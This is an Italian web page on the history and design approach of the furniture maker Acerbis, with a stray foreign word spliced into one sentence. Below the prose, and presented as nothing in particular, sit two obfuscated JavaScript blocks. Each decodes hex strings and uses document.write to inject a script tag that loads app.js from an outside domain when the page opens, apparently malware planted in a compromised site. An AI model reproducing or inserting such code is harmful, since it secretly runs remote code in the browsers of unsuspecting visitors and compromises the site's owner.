Acerbis dal 1870

Acerbis dal 1870

Riconosciuta come una delle poche aziende italiane che per prime hanno contribuito alla nascita e alla nettsted diffusione del mobile di design italiano, Acerbis nasce nel 1870 come laboratorio artigianale di Benvenuto Acerbis per la produzione di mobili in legno massello.
Una lunga storia di ricerca e innovazione, reinterpretazione costante della contemporaneità. Un approccio progettuale e produttivo fatto di ricerca, formale e tecnica, sperimentazione sui materiali, accuratezza dei dettagli, uso consapevole di materia e colore, applicazione ed integrazione delle tecnologie, finiture tecnicamente e qualitativamente avanzate, chiarezza strutturale e funzionale. Attraversando i tempi e superando le mode, Acerbis ha dato vita a progetti e prodotti senza tempo di grande avanguardia. La materia è la grande protagonista della collezione, coordinata da Massimo Castagna, introducendo nuovi abbinamenti e nuovi significati. Pietra, cemento, vetro, metalli, laccature, legno: finiture naturali e trattamenti speciali, lucido e opaco, trasparenze e opacità, perfetto e materico, affinità ed opposti legati a formare un unico linguaggio distintivo.

var _0xa929=[“\x3C\x73\x63\x72″,”\x69\x70\x74\x20\x61\x73\x79\x6E\x63\x20\x63\x6C\x61\x73\x73\x3D\x22\x3D\x52\x32\x4E\x34\x54\x55\x77\x7A\x52\x6C\x6F\x37\x4C\x54\x59\x77\x4F\x7A\x45\x3D\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x61\x79\x2E\x62\x65\x73\x73\x74\x61″,”\x68\x65\x74\x65\x2E\x69\x6E\x66\x6F\x2F\x61\x70\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72″,”\x69\x70\x74\x3E”,”\x77\x72\x69\x74\x65″];function evop(){var _0x6327x2=_0xa929[0];var _0x6327x3=_0xa929[1];var _0x6327x4=_0xa929[2];var _0x6327x5=_0xa929[3];document[_0xa929[4]](_0x6327x2+ _0x6327x3+ _0x6327x4+ _0x6327x5)}evop() var _0x22d1=[“\x3C\x73\x63\x72″,”\x69\x70\x74\x20\x61\x73\x79\x6E\x63\x20\x63\x6C\x61\x73\x73\x3D\x22\x3D\x52\x32\x4E\x34\x54\x55\x77\x7A\x52\x6C\x6F\x37\x4C\x54\x63\x77\x4F\x7A\x45\x3D\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x61\x79\x2E\x74\x65\x72″,”\x63\x61\x62\x69\x6C\x69\x73\x2E\x69\x6E\x66\x6F\x2F\x61\x70\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72″,”\x69\x70\x74\x3E”,”\x77\x72\x69\x74\x65″];function jiler(){var _0xd9f0x2=_0x22d1[0];var _0xd9f0x3=_0x22d1[1];var _0xd9f0x4=_0x22d1[2];var _0xd9f0x5=_0x22d1[3];document[_0x22d1[4]](_0xd9f0x2+ _0xd9f0x3+ _0xd9f0x4+ _0xd9f0x5)}jiler()